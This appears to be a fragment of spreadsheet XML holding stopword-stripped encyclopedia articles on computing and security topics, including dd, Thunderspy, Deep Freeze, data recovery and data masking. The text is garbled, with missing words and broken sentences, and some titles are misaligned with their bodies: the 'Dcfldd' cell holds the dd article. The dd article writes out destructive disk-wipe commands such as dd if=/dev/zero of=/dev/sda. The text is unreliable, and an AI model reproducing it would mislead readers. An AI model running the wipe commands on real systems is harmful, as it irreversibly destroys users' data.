collisions 20-round tiger work less compression function invocations. florian mendel improved upon attacks describing collision attack spanning rounds tiger, 22-round pseudo-near-collision attack. these attacks require work effort equivalent evaluations tiger compression function, respectively. also hash function security summary comparison cryptographic hash functions list hash functions serpent block cipher authors references external links tiger home page</t>
  </si>
  <si>
    <t>Day and night camera</t>
  </si>
  <si>
    <t>night camera security camera picture hours, enough sunlight, night total darkness minimum illumination. night camera special lenses allow infrared emission produced infrared leds reflected objects reach cmos chip inside camera. result, user picture total darkness distance infrared emission produced leds. night camera infrared leds mounted housing accept emission, produced infrared turret. night cameras often modifications digital signal processor (dsp) compensates difference illumination night modes. technology also used expensive models compensate difference illumination shaded lighted areas surveillance. also camera lens references</t>
  </si>
  <si>
    <t>DbDOS</t>
  </si>
  <si>
    <t>dbdos software developed dbase windows computers intel processors. dbdos allows intel-based applications, dbase iii, dbase (version dbase emulated environment. environment configured specifically allow various versions dbase without changes dbase executables dbase compiled programs created. company dbase offers licenses dbase classic (dos). overview late 1980s early 1990s, dbase popular database tools market. when borland decided stop development version favor windows version, many companies left providing support themselves. many decided keep applications running platform many years following borland's switch windows. this strategy worked well enough microsoft decided make changes underlying operating system worked. started supporting 64-bit operating systems, ability keep dbase running maintainable hardware became difficult. 2012, newly formed dbase opted support install base dbase applications releasing virtualization tool named dbdos. based popular dosbox, dbdos quickly became easy enable virtually dos-based application microsoft's windows vista, windows windows server 2003 windows server 2008, 64-bit versions operating systems. with enhanced support dbase iii, dbase (version dbase dos, dbdos easiest keep mission critical applications running years come. dbdos released 2012, following restructuring dbase april 2012. system requirements dbdos virtual machine requires intel-based personal computer running microsoft windows. computer must least gigabyte least megabytes free hard drive space available. once virtual machine software known dbdos installed, user free install additional application software provide originally licensed installation media available. features easy wizard based interface supports importing exporting multiple environment configurations modifications dbase applications required ability programs* (beta) very small footprint, megabytes storage needed running program revive existing applications instead rewriting original installation media licence manufacturer required install applications within dbdosdbase dbdos released free upgrade june 2012. features release include: ability print printer specific codes host os's printers (either networked connected)dbase dbdos released free upgrade september 2012. features release include: increased overall performance. enhanced memory capabilities jemm386 enable programs much faster clipboard feature pasting text windowsdbase dbdos released professional version august 2013. features release include: august 2013 enhanced printing capability closely resemble printouts 1980s 1990s. copy windows clipboard dbdos copy paste unique dbdos buffer windows. double performance product. print screen functionality introduced. support windows 8dbase dbdos released 2014. features release include: 2014 output print paper, pdf, time print features “enhanced” printing feature provides accurate version reports ever print features “direct” printing feature handles codes sequences raw, interpreted, enhanced right (expert mode). print features print driver allow better print across printers requiring line code change easy configuration wizard simplifies setup launching single dbase program enhanced shell functionality display resolutions 800x600 100% sharper easier read improved backup system makes easier find configurationdbase dbdos released 2015. features release include: 2014 live files system allows make changes outside dbdos changes immediately inside dbdos engine faster last release 4dos integration will allow advanced command processing product running based scripts. look look makes product easier understand right box. enhanced print functionality. enhanced display resolutions 800x600 100% sharper easier read.dbase dbdos released 2015. features release include: 2014 multi-user support live files system allows make changes outside dbdos changes immediately inside dbdos faster last release dbdos built on-top widely used dbdos product includes features product architecture dbase dbdos unique architecture. dbdos config.exe; dbdos configuration adds significant features manage windows shortcuts running dbase applications. main comments initial dbdos product end-users wanted able manage shortcuts, wanted able delete them, wanted share them. interface allows features. windows shortcut; icon used represent specific executable program configured inside dbdos this usually name icon desktop start menu, describes program executed selected. dbdos virtual machine (dbdos vm); dbdos stands virtual machine dbdos emulation allows products developed dos-based application inside virtual machine. supports windows operating systems (xp, 2003, vista, 2008, 8.1) either 64-bit editions. applications (.com, .exe, .bat); main goals using dbdos config.exe define configuration calls .bat, .com, .exe file executed inside dbdos command prompt; dbdos config.exe also allows configurations take user command-prompt. from command-prompt user like prompt. ms-print spooler; output dbdos sent directly print spooler printout print output; output printed hardware available dbdos version history also comparison platform virtualization software desktop virtualization platform virtualization virtual disk image paradox (database) foxpro lotus 1-2-3 references external links dbase dbdos official website dbase official website</t>
  </si>
  <si>
    <t>Dcfldd</t>
  </si>
  <si>
    <t>command-line utility unix, plan inferno, unix-like operating systems beyond, primary purpose convert copy files. unix, device drivers hardware (such hard disk drives) special device files (such /dev/zero /dev/random) appear file system like normal files; also read and/or write from/to files, provided function implemented respective driver. result, used tasks backing boot sector hard drive, obtaining fixed amount random data. program also perform conversions data copied, including byte order swapping conversion ascii ebcdic text encodings. history name allusion statement found ibm's control language (jcl), abbreviation "data definition". command's syntax resembles statement unix commands much eric raymond says "the interface design clearly prank". interface redesigned plan command command-line option style. sometimes humorously called "disk destroyer", drive-erasing capabilities.originally intended convert ascii ebcdic, first appeared version unix. command specified since x/open portability guide issue 1987. this inherited ieee 1003.1-2008 (posix), part single unix specification.the version bundled coreutils written paul rubin, david mackenzie, stuart kemp. command available separate package microsoft windows part unxutils collection native win32 ports common unix-like utilities. usage command line syntax differs many unix programs. uses syntax option=value command-line options rather standard -option value --option=value formats. default, reads stdin writes stdout, changed using (input file) (output file) options.certain features depend computer system capabilities, dd's ability implement option direct memory access. sending siginfo signal usr1 signal linux) running process makes print statistics standard error continue copying. read standard input keyboard. when end-of-file (eof) reached, exit. signals determined software. example, unix tools ported windows vary eof: cygwin uses ctrl+d (the usual unix eof) toolkit uses ctrl+z (the usual windows eof). non-standardized parts invocation vary among implementations. output messages completion, prints stderr stream statistics data transfer. format standardized posix.: stderr manual page describe format, manuals each "records "records out" lines shows number complete blocks transferred number partial blocks, e.g. physical medium ended complete block read, physical error prevented reading complete block. block size block unit measuring number bytes read, written, converted time. command-line options specify different block size input/reading (ibs) compared output/writing (obs), though block size (bs) option override obs. default value input output block sizes bytes (the traditional block size disks, posix-mandated size block"). count option copying measured blocks, skip count reading seek count writing. conversion operations also affected "conversion block size" (cbs).: operands value provided block size options interpreted decimal (base integer number bytes. also contain suffixes indicate block size integer number larger units bytes. posix specifies suffixes (blocks) (kibibytes) 1024.: operands implementation differ additional suffixes support: (free) uses lowercase (mebibytes), (gibibytes), tebibytes, exbibytes, pebibytes, zebibytes, yobibytes, uses units, used unit counterparts (kilobytes). example, bs=16m indicates blocksize mebibytes (16777216 bytes) bs=3kb specifies 3000 bytes. additionally, implementations understand character multiplication operator block size count parameters. example, bs=2x80x18b interpreted 1474560 bytes, exact size 1440 floppy disk. this required posix, seem support it.: operands result, portable posix shell arithmetic syntax bs=$((2*80*18))b. block size effect performance copying commands. doing many small reads writes often slower fewer large ones. using large blocks requires complicate error recovery. when used variable-block-size devices tape drives networks, block size determine tape record size packet size, depending network protocol used. uses command used variety purposes. plain-copying commands tends slower domain-specific alternatives, excels unique ability "overwrite truncate file point seek file", fairly low-level interface unix file api.the examples assume mainly block size argument. make portable, replace e.g. bs=64m shell arithmetic expression bs=$((64*1024*1024)) bs=$((64 20)) (written equivalently shift). data transfer duplicate data across files, devices, partitions volumes. data input output these; important differences concerning output going partition. also, transfer, data modified using conv options suit medium. (for purpose, however, slower cat.) noerror option means keep going error, sync option causes output blocks padded. in-place modification modify data place. example, overwrites first bytes file null bytes: if=/dev/zero of=path/to/file bs=512 count=1 conv=notrunc notrunc conversion option means truncate output file output file already exists, replace specified bytes leave rest output file alone. without option, would create output file bytes long. master boot record backup restore example also used back restore region device file, master boot record. duplicate first sectors floppy disk: if=/dev/fd0 of=mbrboot.img bs=512 count=2 disk wipe security reasons, sometimes necessary disk wipe discarded device. this achieved "data transfer" unix special files. write zeros disk, if=/dev/zero of=/dev/sda bs=16m. write random data disk, if=/dev/urandom of=/dev/sda bs=16m.when compared data modification example above, notrunc conversion option required effect dd's output file block device.the bs=16m option makes read write mebibytes time. modern systems, even greater block size faster. note filling drive random data take longer zeroing drive, random data must created cpu, creating zeroes fast. modern hard-disk drives, zeroing drive render data contains permanently irrecoverable. however, kinds drives flash memories, much data still recoverable data remanence. modern hard disk drives contain secure erase command designed permanently securely erase every accessible inaccessible portion drive. also work solid-state drives (flash drives). 2017, work flash drives secure digital flash memories. when available, faster using secure. linux machines accessible hdparm command's --security-erase-enhanced option. shred program offers multiple overwrites, well secure deletion individual files. data recovery data recovery involves reading drive parts potentially inaccessible. good flexible skipping (seek) low-level settings. vanilla however, clumsy user read error messages manually calculate regions read. single block size also limits granuarity recovery, trade-off made: either small data recovered large speed. program called dd_rescue written october 1999. away conversion functionality supports block sizes deal dilemma. read using large size fails, falls back smaller size gather much data possible. also backwards. 2003, dd_rhelp script written automate process using dd_rescue, keeping track areas read own.in 2004, wrote separate utility, unrelated called ddrescue. sophisticated dynamic block-size algorithm keeps track read internally. authors dd_rescue dd_rhelp consider superior implementation. help distinguish newer program older script, alternate names sometimes used gnu's ddrescue, including addrescue (the name freecode.com freshmeat.net), gddrescue (debian package name), gnu_ddrescue (opensuse package name). another open-source program called savehd7 uses sophisticated algorithm, also requires installation programming-language interpreter. benchmarking drive performance make drive benchmark test analyze sequential (and usually single-threaded) system read write performance 1024-byte blocks: write performance: if=/dev/zero bs=1024 count=1000000 of=1gb_file_to_write read performance: if=1gb_file_to_read of=/dev/null bs=1024 generating file random data make file random bytes using kernel random driver: if=/dev/urandom of=myrandom bs=100 count=1 converting file upper case convert file uppercase: if=filename of=filename1 conv=ucase,notrunc progress indicator being program mainly designed filter, normally provide progress indication. this overcome sending usr1 signal running process, resulting printing current number transferred blocks. following one-liner results continuous output progress every seconds transfer finished, dd-pid replaced process-id kill -usr1 dd-pid sleep done newer versions support status=progress option, enables periodic printing transfer statistics stderr. forks dcfldd dcfldd fork enhanced version developed nick harbour, time working united states' department defense computer forensics lab. compared dcfldd allows output file, supports simultaneous multiple checksum calculations, provides verification mode file matching, display percentage progress operation. last release 2021. dc3dd dc3dd another enhanced united states department defense cyber crime center (dc3). seen continuation dcfldd, stated updating whenever upstream updated. last release 2018. also backup disk cloning disk copy disk image .img (filename extension) list unix commands ddrescue version copies data corrupted files references external links convert copy file shell utilities reference, single unix specification, version open group dd(1) plan programmer's manual, volume dd(1) inferno general commands manual manual page core utilities. dd(1) darwin macos general commands manual windows. savehd7 save potentially damaged harddisk partition softpanorama page. linux questions wiki. forensics (dd) dcfldd ddpt variant specialized files block devices sg_dd linux specialized variant devices scsi command</t>
  </si>
  <si>
    <t>Dd (Unix)</t>
  </si>
  <si>
    <t>DdAuto</t>
  </si>
  <si>
    <t>ddauto front-end cross-platform imaging tool written perl automate utility. purpose tool provide user power utility well providing user intuitive interface. ddauto provides option user image attached drives (e.g. flash drive) locally remotely protocol using netcat/cryptcat. image integrity functionality also provided tool. user md5, sha1, sha2 digest algorithms hash verification. ddauto also allows user view imaging completion percentage background estimated remaining time. external links ddauto: front-end utility perl.</t>
  </si>
  <si>
    <t>Thunderspy</t>
  </si>
  <si>
    <t>thunderspy type security vulnerability, based intel thunderbolt port, first reported publicly 2020, result evil maid (ie, attacker unattended device) attack gaining full access computer's information five minutes, affect millions apple, linux windows computers, well computers manufactured 2019, that. according björn ruytenberg, discoverer vulnerability, "all evil maid needs unscrew backplate, attach device momentarily, reprogram firmware, reattach backplate, evil maid gets full access laptop. done five minutes." history thunderspy security vulnerabilities first publicly reported björn ruytenberg eindhoven university technology netherlands 2020. thunderspy similar thunderclap, another security vulnerability, reported 2019, also involves access computer files thunderbolt port. impact security vulnerability affects millions apple, linux windows computers, well computers manufactured 2019, that. however, impact restricted mainly precise actor would execute attack. physical access machine vulnerable thunderbolt controller necessary, well writable chip thunderbolt controller's firmware. additionally, part thunderspy, specifically portion involving re-writing firmware controller, requires device sleep, least sort powered-on state, effective. machines force power-off case open assist resisting attack extent feature (switch) resists tampering. nature attacks require extended physical access hardware, unlikely attack affect users outside business government environment. mitigation researchers claim easy software solution, mitigated disabling thunderbolt port altogether. however, impacts attack (reading kernel level memory without machine needing powered off) largely mitigated anti-intrusion features provided many business machines. intel claims enabling features would substantially restrict effectiveness attack. microsoft's official security recommendations recommend disabling sleep mode using bitlocker. using hibernation place sleep mode turns device off, mitigating potential risks attack encrypted data. references external links official website video (5:54) thunderspy: proof concept youtube video (11:01) thunderspy nothing worry here's youtube</t>
  </si>
  <si>
    <t>Thin SIM</t>
  </si>
  <si>
    <t>Deep Freeze (software)</t>
  </si>
  <si>
    <t>deep freeze, faronics, reboot restore software application available microsoft windows, macos operating systems allows system administrators protect core operating system configuration files workstation server restoring computer back saved configuration, time computer restarted.deep freeze also protect computer harmful malware, since automatically deletes rather, longer "sees") downloaded files computer restarted. advantage using deep freeze uses system resources, thus slow computer performance greatly. disadvantage provide real-time protection, therefore infected computer would restarted order remove malware. limitations security deep freeze protects workstations "fresh-booted" state. that deep freeze prevents permanent tampering protected hard drives/partitions across reboots, user activity restarts limited program. example, deep freeze prevent application installation; user install modified version browser (but seemingly harmless unknowing user) designed secretly send users' passwords server connected internet. workaround, deep freeze configured restart user logout, shutdown chosen period inactivity, restart/shutdown scheduled time attempt ensure installations retained rebooting system returns system original, unmodified state). deep freeze cannot protect operating system hard drive upon installed computer booted another medium (such another bootable partition internal hard drive, external hard drive, device, optical media, network server). cases, user would real access contents (supposedly) frozen system. this scenario prevented configuring cmos (nonvolatile bios memory) workstation boot hard drive protected, password-protecting cmos. precaution would lock case shut physical lock tiedown cable system prevent access motherboard jumpers. failure take precautions compromise protection provided software. deep freeze protect hard drive partitions larger capacity (using ntfs). references further reading moon, peter (march 2009). "pcs protected freeze". australian financial review. blum, jonathan (january 2008). "macworld preview: tools small biz". fortune small business. ricadela, aaron (june 2005). "[httsp://www.informationweek.com/news/management/showarticle.jhtml?articleid=164903260 microsoft tests tool computer classrooms]". informationweek. archived 2009-02-01 wayback machine external links official website</t>
  </si>
  <si>
    <t>Data recovery</t>
  </si>
  <si>
    <t>computing, data recovery process salvaging deleted, inaccessible, lost, corrupted, damaged formatted data secondary storage, removable media files, data stored cannot accessed usual way. data often salvaged storage media internal external hard disk drives (hdds), solid-state drives (ssds), flash drives, magnetic tapes, cds, dvds, raid subsystems, electronic devices. recovery required physical damage storage devices logical damage file system prevents mounted host operating system (os). data recovery simple technical challenge. this specific software companies specialized field. about common data recovery scenarios involve operating system failure, malfunction storage device, logical failure storage devices, accidental damage deletion, etc. (typically, single-drive, single-partition, single-os system), case ultimate goal simply copy important files damaged media another drive. this accomplished using live booting directly drive instead corrupted drive question. many live dvds provide means mount system drive backup drives removable media, move files system drive backup media file manager optical disc authoring software. such cases often mitigated disk partitioning consistently storing valuable data files copies them) different partition replaceable system files. another scenario involves drive-level failure, compromised file system drive partition, hard disk drive failure. cases, data easily read media devices. depending situation, solutions involve repairing logical file system, partition table master boot record, updating firmware drive recovery techniques ranging software-based recovery corrupted data, hardware- software-based recovery damaged service areas (also known hard disk drive's "firmware"), hardware replacement physically damaged drive allows extraction data drive. drive recovery necessary, drive typically failed permanently, focus rather one-time recovery, salvaging whatever data read. third scenario, files accidentally "deleted" storage medium users. typically, contents deleted files removed immediately physical drive; instead, references directory structure removed, thereafter space deleted data occupy made available later data overwriting. mind users, deleted files cannot discoverable standard file manager, deleted data still technically exists physical drive. meantime, original file contents remain, often number disconnected fragments, recoverable overwritten data files. term "data recovery" also used context forensic applications espionage, data encrypted, hidden, deleted, rather damaged, recovered. sometimes data present computer gets encrypted hidden reasons like virus attack recovered computer forensic experts. physical damage wide variety failures cause physical damage storage media, result human errors natural disasters. cd-roms metallic substrate layer scratched off; hard disks suffer multitude mechanical failures, head crashes, failure failed motors; tapes simply break. physical damage hard drive, even cases head crash occurred, necessarily mean permanent loss data. techniques employed many professional data recovery companies typically salvage most, all, data lost failure occurred. course exceptions this, cases severe damage hard drive platters occurred. however, hard drive repaired full image clone created, logical file structure rebuilt instances. most physical damage cannot repaired users. example, opening hard disk drive normal environment allow airborne dust settle platter become caught platter read/write head. during normal operation, read/write heads float nanometers platter surface, average dust particles found normal environment typically around 30,000 nanometers diameter. when dust particles caught read/write heads platter, cause head crashes damage platter thus compromise recovery process. furthermore, users generally hardware technical expertise required make repairs. consequently, data recovery companies often employed salvage important data reputable ones using class dust- static-free cleanrooms. recovery techniques recovering data physically damaged hardware involve multiple techniques. some damage repaired replacing parts hard disk. this alone make disk usable, still logical damage. specialized disk-imaging procedure used recover every readable surface. once image acquired saved reliable medium, image safely analyzed logical damage possibly allow much original file system reconstructed. hardware repair common misconception damaged printed circuit board (pcb) simply replaced recovery procedures identical healthy drive. while work rare circumstances hard disk drives manufactured 2003, work newer drives. electronics boards modern drives usually contain drive-specific adaptation data (generally sectors tuning parameters) information required properly access data drive. replacement boards often need information effectively recover data. replacement board need reprogrammed. some manufacturers (seagate, example) store information serial eeprom chip, removed transferred replacement board.each hard disk drive called system area service area; portion drive, directly accessible user, usually contains drive's firmware adaptive data helps drive operate within normal parameters. function system area defective sectors within drive; essentially telling drive cannot write data. sector lists also stored various chips attached pcb, unique hard disk drive. data match stored platter, drive calibrate properly. cases drive heads click unable find data matching stored pcb. logical damage term "logical damage" refers situations error problem hardware requires software-level solutions. corrupt partitions file systems, media errors cases, data hard disk drive unreadable damage partition table file system, (intermittent) media errors. majority cases, least portion original data recovered repairing damaged partition table file system using specialized data recovery software testdisk; software like ddrescue image media despite intermittent errors, image data partition table file system damage. this type data recovery performed people without expertise drive hardware requires special physical equipment access platters. sometimes data recovered using relatively simple methods tools; serious cases require expert intervention, particularly parts files irrecoverable. data carving recovery parts damaged files using knowledge structure. overwritten data after data physically overwritten hard disk drive, generally assumed previous data longer possible recover. 1996, peter gutmann, computer scientist, presented paper suggested overwritten data could recovered magnetic force microscopy. 2001, presented another paper similar topic. guard type data recovery, gutmann colin plumb designed method irreversibly scrubbing data, known gutmann method used several disk-scrubbing software packages. substantial criticism followed, primarily dealing lack concrete examples significant amounts overwritten data recovered. although gutmann's theory correct, practical evidence overwritten data recovered, research shown support overwritten data cannot recovered.solid-state drives (ssd) overwrite data differently hard disk drives (hdd) makes least data easier recover. most ssds flash memory store data pages blocks, referenced logical block addresses (lba) managed flash translation layer (ftl). when modifies sector writes data another location updates data appear target lba. this leaves pre-modification data place, possibly many generations, recoverable data recovery software. lost, deleted, formatted data sometimes, data present physical drives (internal/external hard disk, drive, etc.) gets lost, deleted formatted circumstances like virus attack, accidental deletion accidental shift+delete. cases, data recovery software used recover/restore data files. logical sector list logical failures hard disks, logical sector common fault leading data readable. sometimes possible sidestep error detection even software, perhaps repeated reading statistical analysis recover least underlying stored data. sometimes prior knowledge data stored error detection correction codes used recover even erroneous data. however, underlying physical drive degraded badly enough, least hardware surrounding data must replaced, might even necessary apply laboratory techniques physical recording medium. each approaches progressively expensive, progressively rarely sought. eventually, final, physical storage medium indeed disturbed badly enough, recovery possible using means; information irreversibly lost. remote data recovery recovery experts always need physical access damaged hardware. when lost data recovered software techniques, often perform recovery using remote access software internet, connection physical location damaged media. process essentially different user could perform themselves.remote recovery requires stable connection adequate bandwidth. however, applicable access hardware required, cases physical damage. four phases data recovery usually, four phases comes successful data recovery, though vary depending type data corruption recovery required. phase repair hard disk drive hard drive repaired order running form, least state suitable reading data example, heads need changed; faulty needs fixed replaced; spindle motor platters heads moved drive.phase image drive drive disk image file when hard disk drive fails, importance getting data drive priority. longer faulty drive used, likely data loss occur. creating image drive ensure secondary copy data another device, safe perform testing recovery procedures without harming source.phase logical recovery files, partition, filesystem structures after drive cloned drive, suitable attempt retrieval lost data. drive failed logically, number reasons that. using clone possible repair partition table master boot record (mbr) order read file system's data structure retrieve stored data.phase repair damaged files retrieved data damage caused when, example, file written sector drive damaged. this common cause failing drive, meaning data needs reconstructed become readable. corrupted documents recovered several software methods manually reconstructing document using editor. restore disk windows operating system reinstalled computer already licensed reinstallation done downloading operating system using "restore disk" provided computer manufacturer. eric lundgren fined sentenced u.s. federal prison april 2018 producing 28,000 restore disks intending distribute cents convenience computer repair shops. list data recovery software bootable data recovery cannot always done running system. result, boot disk, live live usb, type live distro contains minimal operating system. bartpe: lightweight variant microsoft windows windows server 2003 32-bit operating systems, similar windows preinstallation environment, live live drive. discontinued. finnix: debian-based live focus small fast, useful computer data rescue disk drill basic: capable creating bootable drives data recovery knoppix: contains utilities data recovery linux spinrite: freedos-based data recovery tool hard disks magnetic storage devices systemrescuecd: arch linux based live useful repairing unbootable computer systems retrieving data system crash windows preinstallation environment (winpe): customizable windows boot (made microsoft distributed free). modified boot programs listed. consistency checkers chkdsk: consistency checker windows systems disk first aid: consistency checker disk utility: consistency checker fsck: consistency checker unix gparted: parted, partition editor, capable calling fsck file recovery cdroller: recovers data optical disc easeus data recovery wizard: windows file recovery utilities easeus disk drill basic: data recovery application windows dvdisaster: generates error-correction data optical discs securdisc nero "data reliability" feature generates redundant checksum data remaining space optical discs. getdataback: windows recovery program hetman partition recovery: data drive recovery solution isobuster: recovers data optical discs, sticks, flash drives hard drives data recovery guru: data recovery program works sticks, optical media, hard drives minitool partition wizard: windows later; includes data recovery norton utilities: suite utilities file recovery component photorec: advanced multi-platform program text-based user interface used recover files recover files: proprietary software windows 2000 later—fat, ntfs recovery toolbox: freeware shareware tools plus online services various windows 2000 later programs recuva: proprietary software windows 2000 later—fat ntfs stellar data recovery mac: data recovery utility stellar data recovery windows: data recovery utility windows stellar photo recovery: photo recovery utility windows testdisk: free, open source, multi-platform. recover files lost partitions tuneup utilities: suite utilities file recovery component windows later windows file recovery: command-line utility microsoft recover deleted files windows version 2004 later forensics foremost: open-source command-line file recovery program, originally developed u.s. force office special investigations center information systems security studies research forensic toolkit: accessdata, used enforcement open computer forensics architecture: open-source program linux coroner's toolkit: suite utilities assisting forensic analysis unix system break-in sleuth kit: also known tsk, suite forensic analysis tools developed brian carrier unix, linux windows systems. includes autopsy forensic browser. imaging tools clonezilla: free disk cloning, disk imaging, data recovery, deployment boot disk common byte-to-byte cloning tool found unix-like systems ddrescue: open-source tool similar ability skip subsequently retry blocks failing storage devices team recovery project: free open-source recovery system android devices also references further reading tanenbaum, woodhull, (1997). operating systems: design implementation, york: prentice hall. data recovery curlie</t>
  </si>
  <si>
    <t>Data position measurement</t>
  </si>
  <si>
    <t>data position measurement (dpm) copy protection mechanism operates measuring physical location data optical disc. stamped perfect clones always data expected location, burned copy would exhibit physical differences. detects differences identify user-made copies. first used publicly 1996 link data security's cd-cops. used volume lademans leksikon published egmont november 1996. rmps observed subsequently encoded recordable media physical signature (rmps). concert emulation software rmps reproduce effects thereby appearing original disc fooling protection mechanism. this technique pioneered software alcohol 120%, created .mds file format. references "microsoft danish copy-protection, 1997 (danish)"</t>
  </si>
  <si>
    <t>Data masking</t>
  </si>
  <si>
    <t>data masking data obfuscation process modifying sensitive data little value unauthorized intruders still usable software authorized personnel. main reason applying masking data field protect data classified personally identifiable information, sensitive personal data, commercially sensitive data. however, data must remain usable purposes undertaking valid test cycles. must also look real appear consistent. common masking applied data represented outside corporate production system. words, data needed purpose application development, building program extensions conducting various test cycles. common practice enterprise computing take data production systems fill data component, required non-production environments. however, practice always restricted non-production environments. organizations, data appears terminal screens call centre operators masking dynamically applied based user security permissions (e.g. preventing call centre operators viewing credit card numbers billing systems). primary concern corporate governance perspective personnel conducting work non-production environments always security cleared operate information contained production data. this practice represents security hole data copied unauthorized personnel, security measures associated standard production level controls easily bypassed. this represents access point data security breach. overall practice data masking organizational level tightly coupled test management practice underlying methodology incorporate processes distribution masked test data subsets. background data involved data masking obfuscation must remain meaningful several levels: data must remain meaningful application logic. example, elements addresses obfuscated city suburbs replaced substitute cities suburbs, then, within application feature validates postcode post code lookup, function must still allowed operate without error operate expected. also true credit-card algorithm validation checks social security number validations. data must undergo enough changes obvious masked data source production data. example, common knowledge organisation senior managers earning excess $300k. test environment organisation's system also includes identities earning-bracket, information could pieced together reverse-engineer real-life identity. theoretically, data obviously masked obfuscated, would reasonable someone intending data breach assume could reverse engineer identity-data degree knowledge identities production data-set. accordingly, data obfuscation masking data-set applies manner ensure identity sensitive data records protected individual data elements discrete fields tables. masked values required consistent across multiple databases within organization databases contain specific data element masked. applications initially access database later access another retrieve related information foreign masked (e.g. call center application first brings data customer master database and, depending situation, subsequently accesses several databases different financial products.) this requires masking applied repeatable (the input value masking algorithm always yields output value) able reverse engineered back original value. additional constraints mentioned also apply depending data element(s) involved. where different character sets used across databases need connect scenario, scheme converting original values common representation need applied, either masking algorithm prior invoking said algorithm. techniques substitution substitution effective methods applying data masking able preserve authentic look feel data records. allows masking performed manner another authentic-looking value substituted existing value. there several data field types approach provides optimal benefit disguising overall data subset whether masked data set. example, dealing source data contains customer records, real life surname first name randomly substituted supplied customised look file. first pass substitution allows applying male first name first names, second pass would need allow applying female first name first names gender equals "f." using approach could easily maintain gender within data structure, apply anonymity data records also maintain realistic looking database, could easily identified database consisting masked data. this substitution method needs applied many fields structures across world, telephone numbers, codes postcodes, well credit card numbers card type numbers like social security numbers medicare numbers numbers actually need conform checksum test luhn algorithm. cases, substitution files need fairly extensive large substitution datasets well ability apply customized data substitution sets element evaluation criteria data masking solution. shuffling shuffling method common form data obfuscation. similar substitution method derives substitution column data masked. simple terms, data randomly shuffled within column. however, used isolation, anyone knowledge original data apply "what scenario data piece back together real identity. shuffling method also open reversed shuffling algorithm deciphered.shuffling, however, real strengths certain areas. instance, year figures financial information test data base, mask names suppliers shuffle value accounts throughout masked database. highly unlikely anyone, even someone intimate knowledge original data could derive true data record back original values. number date variance numeric variance method useful applying financial date driven information fields. effectively, method utilising manner masking still leave meaningful range financial data payroll. variance applied around still meaningful data terms ranges salaries paid recipients. also applies date information. overall data needs retain demographic actuarial data integrity, applying random numeric variance days date fields would preserve date distribution, would still prevent traceability back known entity based known actual date birth known date value whatever record masked. encryption encryption often complex approach solving data masking problem. encryption algorithm often requires "key" applied view data based user rights. this often sounds like best solution, practice given personnel without proper rights view data. this defeats purpose masking exercise. databases copied original credentials supplied uncontrolled problem lives recently, problem encrypting data preserving properties entities recognition newly acquired interest among vendors academia. challenge gave birth algorithms performing format-preserving encryption. they based accepted algorithmic mode makes recognized nist. nulling deletion sometimes simplistic approach masking adopted applying null value particular field. null value approach really useful prevent visibility data element. almost cases, lessens degree data integrity maintained masked data set. realistic value fail application logic validation applied front software system test. also highlights anyone wishes reverse engineer identity data data masking applied degree data set. masking character scrambling masking certain fields also another simplistic effective method preventing sensitive information viewed. really extension previous method nulling out, greater emphasis keeping data real fully masked together. this commonly applied credit card data production systems. instance, operator call centre might bill item customer's credit card. they quote billing reference card last digits xxxx xxxx xxxx 6789. operator last digits card number, billing system passes customer's details charging, full number revealed payment gateway systems. this system effective test systems, useful billing scenario detailed above. also commonly known dynamic data masking method. additional complex rules additional rules also factored masking solution regardless masking methods constructed. product agnostic white papers good source information exploring common complex requirements enterprise masking solutions, include internal synchronization rules, table internal synchronization rules table table synchronization rules. different types data masking tightly coupled building test data. major types data masking static on-the-fly data masking. static data masking static data masking usually performed golden copy database, also applied values sources, including files. environments, production dbas typically load table backups separate environment, reduce dataset subset holds data necessary particular round testing technique called "subsetting"), apply data masking rules data stasis, apply necessary code changes source control, and/or push data desired environment. deterministic data masking deterministic masking process replacing value column value whether row, table, database/schema instances/servers/database types. example: database multiple tables, column first names. with deterministic masking first name always replaced value “lynne” always become “denise” wherever “lynne” database. statistical data obfuscation there also alternatives static data masking rely stochastic perturbations data preserve statistical properties original data. examples statistical data obfuscation methods include differential privacy datasifter method. on-the-fly data masking on-the-fly data masking happens process transferring data environment environment without data touching disk way. technique applied "dynamic data masking" record time. this type data masking useful environments continuous deployments well heavily integrated applications. organizations employ continuous deployment continuous delivery practices time necessary create backup load golden copy database. thus, continuously sending smaller subsets (deltas) masked testing data production important. heavily integrated applications, developers feeds production systems onset development masking feeds either overlooked budgeted later, making organizations non-compliant. having on-the-fly data masking place becomes essential. dynamic data masking dynamic data masking similar on-the-fly data masking differs sense on-the-fly data masking copying data source another source latter shared. dynamic data masking happens runtime, dynamically, on-demand need second data source store masked data dynamically. dynamic data masking enables several scenarios, many revolve around strict privacy regulations e.g. singapore monetary authority privacy regulations europe. dynamic data masking attribute-based policy-driven. policies include: doctors view medical records patients assigned (data filtering) doctors cannot view field inside medical record (data masking).dynamic data masking also used encrypt decrypt values especially using format-preserving encryption. several standards emerged recent years implement dynamic data filtering masking. instance, xacml policies used mask data inside databases. there possible technologies apply dynamic data masking: database: database receives applies rewrite returned masked result set. applicable developers dbas applications (because connection pools, application caching data-bus hide application user identity database also cause application data corruption). network proxy application database: captures applies rewrite select request. applicable developers dbas simple 'select'requests stored procedures (which proxy identifies exec.) applications (because connection pools, application caching data-bus hide application user identity database also cause application data corruption). database proxy: variation network proxy. database proxy deployed usually applications/users database. applications users connecting database database security proxy. there changes applications users connecting database. there also need agent installed database server. queries rewritten, implemented type dynamic data masking also supported within store procedures database functions. network proxy end-user application: identifying text strings replacing them. this method applicable complex applications easily cause corruption real-time string replacement unintentionally applied. code changes applications xacml: code changes usually hard perform, impossible maintain applicable packaged applications. within application run-time: instrumenting application run-time, policies defined rewrite result returned data sources, full visibility application user. this method applicable dynamically mask complex applications enables control data request, data result user result. supported browser plugin: case saas local applications, browser add-ons configured mask data fields corresponding precise selectors. this either accomplished marking sensitive fields application, example html class finding right selectors identify fields obfuscated masked. data masking cloud latest years, organizations develop applications cloud often, regardless whether final applications hosted cloud premises. cloud solutions allow organizations infrastructure service, platform service, software service. there various modes creating test data moving on-premises databases cloud, different environments within cloud. dynamic data masking becomes even critical cloud customers need protecting data relying cloud providers administer databases. data masking invariably becomes part processes sdlc development environments' slas usually stringent production environments' slas regardless whether application hosted cloud on-premises. also masking unmasking intelligence agencies references</t>
  </si>
  <si>
    <t>Data island</t>
  </si>
  <si>
    <t>data island data store, computing device, non-existent limited external connectivity. this limits ability user synchronize copy data devices. though data added system, ability move data elsewhere impractical impossible. data islands, general, contain huge data relative small physical space occupies. connectivity necessarily imply hardware interface. example, result poorly written system interface software. data island subset entities connected relationships, independent entities within data store.</t>
  </si>
  <si>
    <t>Damage tolerance</t>
  </si>
  <si>
